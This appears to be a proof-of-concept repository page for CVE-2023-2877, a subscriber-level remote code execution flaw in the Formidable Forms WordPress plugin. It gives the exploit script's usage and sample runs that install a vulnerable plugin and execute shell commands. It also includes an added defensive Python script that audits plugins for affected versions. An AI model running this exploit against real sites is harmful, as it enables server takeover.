CVE-2023-2877 PoC — WordPress plugin Formidable Forms security vulnerability

Source
Associated Vulnerability
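Title: WordPress plugin Formidable Forms security vulnerability (CVE-2023-2877)
Description: WordPress and WordPress plugin are both products of the WordPress Foundation. WordPress is a blogging platform developed in PHP. The platform supports setting up personal blog sites on servers running PHP and MySQL. WordPress plugin is an application plugin. WordPress plugin Formidable Forms before 6.3.1 contains a security vulnerability that stems from insufficient validation of the plugin URL; an attacker can exploit it to achieve remote code execution.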
Description
Formidable Forms < 6.3.1 - Subscriber+ Remote Code Execution
Readme
# CVE-2023-2877
Formidable Forms < 6.3.1 - Subscriber+ Remote Code Execution


Usage
---

```
usage: CVE-2023-2877.py [-h] -w URL -u USERNAME -p PASSWORD [-pl PLUGIN] [-c CMD]

CVE-2023-2877 - Formidable Forms < 6.3.1 - Subscriber+ Remote Code Execution Script

options:
  -h, --help            show this help message and exit
  -w URL, --url URL     WordPress site URL
  -u USERNAME, --username USERNAME
                        WordPress username
  -p PASSWORD, --password PASSWORD
                        WordPress password
  -pl PLUGIN, --plugin PLUGIN
                        Different Plugin to Install i.e mstore-api.3.9.0.zip
  -c CMD, --cmd CMD     Command value
```

Example
---

```
$ python3 CVE-2023-2877.py -w http://wordpress.lan -u user -p useruser1
Successfully logged in.
Token extracted: 15157e0f4740e9d1bbccdc5edbef1292943daf7d064637de094b2af2e9364ee9262f985d41d1658d90f1387800d09e8269a93f6397333e61c13240ababb4648d
Plugin installed successfully.
Now run exploit script with --cmd / -c and command.
```

```
$ python3 CVE-2023-2877.py -w http://wordpress.lan -u user -p useruser1 -c id
Data:
[['uid=33(www-data) gid=33(www-data) groups=33(www-data)']]
```

Warning
---
YOU NEED TO UNINSTALL THE VULNERABLE PLUGIN User Post Gallery as it's got no authentication!
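
A defender-side check for the two conditions this README names (Formidable Forms older than 6.3.1, and a leftover User Post Gallery install), added here as an example and not part of the PoC repository. It assumes plugins are identified by the `Plugin Name:` header in their main PHP file; the header names matched and the sample directory names are assumptions.

```python
import re
import tempfile
from pathlib import Path

FIXED = (6, 3, 1)               # Formidable Forms release that fixes CVE-2023-2877
LEFTOVER = "user post gallery"  # assumed header name of the plugin the README warns about

def read_header(php_file):
    """Return (name, version) from a WordPress plugin header comment, or None."""
    head = php_file.read_text(errors="replace")[:8192]  # header sits at the top of the file
    name = re.search(r"^[ \t/*#@]*Plugin Name:\s*(.+)$", head, re.M | re.I)
    ver = re.search(r"^[ \t/*#@]*Version:\s*(.+)$", head, re.M | re.I)
    return (name.group(1).strip(), ver.group(1).strip() if ver else "") if name else None

def version_tuple(text):
    """'6.3' -> (6, 3, 0); a suffix such as '-beta' is ignored, '' -> (0, 0, 0)."""
    nums = [int(n) for n in re.findall(r"\d+", text.split("-")[0])][:3]
    return tuple(nums + [0] * (3 - len(nums)))

def audit(plugins_dir):
    """Return (directory, finding) pairs for plugins under wp-content/plugins."""
    findings = []
    for php in sorted(Path(plugins_dir).glob("*/*.php")):
        header = read_header(php)
        if header is None:
            continue
        name, ver = header
        # A missing Version header parses as (0, 0, 0) and is flagged conservatively.
        if name.lower().startswith("formidable forms") and version_tuple(ver) < FIXED:
            findings.append((php.parent.name, f"{name} {ver or '?'} is older than 6.3.1"))
        elif LEFTOVER in name.lower():
            findings.append((php.parent.name, f"{name} is installed; uninstall it"))
    return findings

def make_sample(root):
    """Constructed plugin tree for the demo; directory names are made up."""
    for slug, name, ver in [("forms-old", "Formidable Forms", "6.3"),
                            ("gallery", "User Post Gallery", "1.0"),
                            ("unrelated", "Some Other Plugin", "2.0")]:
        d = Path(root) / slug
        d.mkdir(parents=True)
        (d / f"{slug}.php").write_text(f"<?php\n/*\nPlugin Name: {name}\nVersion: {ver}\n*/\n")
    return root

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for slug, finding in audit(make_sample(tmp)):
            print(f"{slug}: {finding}")
```

Point `audit()` at a site's real `wp-content/plugins` directory to use it outside the demo.
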
File Snapshot

```
[4.0K] /data/pocs/2da601fef7226c28e8a1d4df97a25360db9e1614
├── [4.3K] CVE-2023-2877.py
├── [ 11K] LICENSE
├── [1.3K] README.md
└── [   9] requirements.txt

0 directories, 4 files
```